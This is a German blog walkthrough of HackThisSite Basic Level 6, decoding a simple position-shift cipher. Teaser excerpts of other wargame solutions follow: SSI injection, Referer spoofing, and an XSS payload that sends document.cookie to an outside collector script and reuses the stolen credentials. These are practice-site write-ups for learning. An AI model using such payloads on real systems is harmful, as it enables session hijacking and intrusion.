Direkt zum Hauptbereich

hackthissite.org Level 6 Basic Lösung


Im Level 6 geht es um eine kleine Decheffrierung. Also du siehst
hier ein Verschlüsseltes Passwort und sollt dieses Entschlüsseln
damit du es eingeben kannst und somit einen level weiter kommst.



Du hast hier eine Hilfe, denn du kannst mit dem oberen Formular selbst daten
verschlüsseln.
Somit kannst du ein Muster erkennen wenn du zum Beispiel hallo oder auch tasse
verschlüsseln lässt.
Wenn du nun ollah oder essat verschlüsseln lässt dann fällt etwas auf oder??


Die Erklärung:

hallo wird zu hbnos
tasse wird zu tbuvi
essat wird zu etudx


Die cheffrierung funktioniert folgend:
Du solltest zum verständniss eine ASCII Tabelle heranziehen!


Formel:



Verschlüsseltes Zeichen = (Position in String) + (Aktuelles Zeichen, ASCII Code)

Somit ist auch klar warum das erste Zeichen sich nie verändert. Da es mit 0 anfängt zu Zählen.



h = 0 ( +0) Bleibt gleich.
a = 1 ( +1)
l = 2 ( +2)
l = 3 ( +3)
0 = 4 ( +4)

 
Hier die Decheffrierung des Verschlüsselten Textes:

1cfh

1= 0 bleibt gleich
c = 1 (-1) b
f = 2 (-2) d
< = 3 (-3) 9
j = 4 (-4) f
k = 5 (-5) f
> = 6 (-6) 8
h = 7 (-7) a


Somit ergibt es das Passwort : 1bd9ff8a

Passwort eingeben und weiter gehts zu level 7.

Kommentare

Unknown hat gesagt…
Dieser Kommentar wurde vom Autor entfernt.
Unknown hat gesagt…
A little tool made by mys3c0ndw0rld to decrypt the password :
http://www.2shared.com/file/Gslp58co/HackThisSite_DecryptME_Basic_6.html

Beliebte Posts aus diesem Blog

hackthissite.org Level 8 Basic Lösung

Hier ist ein eingabeformular in welches du deinen Namen schreiben sollst damit es eine Datei anlegen kann. Zum besseren Verständniss einfach mal testen, also "Mustermann" und auf submit klicken. Nun erscheint der Text: Your file has been saved. Please click here view the file. Hier ist die URL der Datei, welche angelegt wurde: http://www.hackthissite.org/missions/basic/8/tmp/mnxdljrz.shtml Genau, es ist eine shtml Datei also ein Server Side Include (SSI) damit kann man Befehle auf dem Server ausführen lassen und das ergebniss wird dann dem client übergeben! Hier musst du aber das Verzeichniss auslesen damit wir informationen über den Inhalt bekommen. Geb nun einfach mal folgendes in das Feld für den Namen ein: Richtig, ls bei unix/linux "list directory" zeigt den Inhalt eines Verzeichnisses an. Das neu hinzugefügte hier ist "ls ../" ../ heißt ein Verzeichniss nach oben. Also nicht in http://www.hackthissite.org/missions/basic/...

hackthissite.org Level 5 Basic Lösung

Level 5 ist fast gleich wie der Level 4 nur mit dem kleinen Unterschied dass das Skript auf dem Server nun auch schaut woher die Anfrage kommt. Es überprüft also die Referer Url. Damit wir dies umgehen können wird das Skript aus 4 nur Modifiziert. Der HTTP Anfrage wird folgende Zeile hinzugefügt: Referer:http://www.hackthissite.org/missions/basic/5/index.php\r\n So und schon ist auch dass Problem behoben! Das Skript level5.php gibts auch zum Download.

HTS realistic 9, the Codes for the Challenge!

Here are the javascript codes for HTS Level 9: 1. code, take a look at the cookie: javascript:alert(document.cookie); 2. The xss exploit insert into the message to mr. crap: </textarea> <script>window.location="http://getTheScript/getcookiemailer.php?keks="+document.cookie;</script> 3. The code to use the stolen cookie data: javascript:document.cookie="strUsername=m-crap%40crappysoft.com";document.cookie="strPassword=94a35a3b7befff5eb2a8415af04aa16c";document.cookie="intID=1"; Now you can move the money!! 4. Deleting the session data. Log out and go to the main page of crappy soft. Go to the mailing list form. Now you need an Firefox extension like UrlParams or an Proxy with freeze function. Or you manipulate the Post data with an faked http header. How to fake http header with PHP you can take a look at this page: http://hack1n9.blogspot.com/2008/06/hackthissiteorg-level-5-basic-lsung.html But it is written in german. The faste...